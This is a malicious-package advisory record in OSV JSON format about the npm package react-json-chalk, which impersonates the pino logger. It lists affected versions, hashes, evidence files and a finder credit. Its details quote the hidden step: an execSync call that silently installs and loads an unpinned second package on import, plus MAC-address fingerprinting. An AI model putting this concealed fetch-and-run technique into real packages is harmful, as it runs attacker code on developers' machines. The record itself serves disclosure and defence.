{
  "id": "MAL-2026-4792",
  "summary": "Malicious code in react-json-chalk (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77)\nThe package is published as `react-json-chalk` but its `main` entry (`pino.js`) impersonates the pino logger (homepage `https://getpino.io`, bundled pino source tree, misappropriated description). On `require('react-json-chalk')`, `pino.js` immediately loads `lib/writer.js`, which at module top level tries `require('react-pinojs')` and, if absent, executes `child_process.execSync(\"npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent\")` and then `require('../../react-pinojs/pino.js')`. The flags suppress install output and avoid persisting the dependency in package.json, so consumers get no visible signal that a second package was fetched. The fetched dependency is unpinned, fully controlled by whoever publishes `react-pinojs`, and its code runs as part of the require() of this package — arbitrary attacker code on the installer's machine on every import. The same `lib/writer.js` defines `getMacAddress()` which enumerates non-internal IPv4 interface MAC addresses, consistent with host fingerprinting handed off to the second stage. The package name/contents mismatch (logger source tree under an unrelated name) is also a namespace-abuse / pino-impersonation pattern.\n",
  "modified": "2026-06-12T20:01:55.701582873Z",
  "published": "2026-05-26T08:46:33Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "versions": ["13.4.4"],
        "id": "IN-MAL-2026-004875",
        "import_time": "2026-05-26T09:17:32.746004914Z",
        "modified_time": "2026-05-26T08:46:33Z",
        "source": "amazon-inspector",
        "sha256": "c3411327be0927b7a726464d2bd9a590ff4ca61bc08e9170e4c0e482dc18dac2"
      },
      {
        "import_time": "2026-06-12T19:43:35.084546687Z",
        "id": "IN-MAL-2026-005803",
        "versions": ["13.4.6"],
        "modified_time": "2026-06-12T19:02:15Z",
        "source": "amazon-inspector",
        "sha256": "1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77"
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/react-json-chalk/v/13.4.4"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/react-json-chalk/v/13.4.6"}
  ],
  "affected": [
    {
      "package": {"name": "react-json-chalk", "ecosystem": "npm", "purl": "pkg:npm/react-json-chalk"},
      "versions": ["13.4.4", "13.4.6"],
      "database_specific": {
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-json-chalk/MAL-2026-4792.json",
        "indicators": {
          "package_integrity": [
            {
              "hashes": {
                "sha512_sri": "sha512-oos+FlJaUor3f0YgPAwsmL5gu2ba8WcmyDcObhNNH250f40/6SznsPt4RF5Uc2NRWKKrLpb3zWkWRyluWtXHzQ==",
                "sha1": "724a5212fe4047aca98aa934b3032af19109a35d"
              },
              "filename": "react-json-chalk-13.4.4.tgz"
            }
          ],
          "evidence_files": [
            {
              "path": "lib/writer.js",
              "tlsh": "05318bd78245a278f3b06aa10e5fa0d1b186e12521507dd83ffc84c367ab4e04ed4fd6",
              "sha256": "1ab7958719307e09d349a855f54b59c7e5fe94d2f00b05440e2669b702514c7d"
            },
            {
              "path": "package.json",
              "tlsh": "dc018925ce785da308ec248548290252aa60ed6b584cfd5973d7a32c0f4e5bf68be1ad",
              "sha256": "9b2a5f6bbbfa55f7db60f3e83edf0a71ddf98c5a2830aedcb35af2bd7a9b338e"
            }
          ]
        },
        "cwes": [
          {
            "description": "The product contains code that appears to be malicious in nature.",
            "cweId": "CWE-506",
            "name": "Embedded Malicious Code"
          }
        ]
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {
      "name": "Amazon Inspector",
      "contact": ["actran@amazon.com", "inspector-research@amazon.com"],
      "type": "FINDER"
    }
  ]
}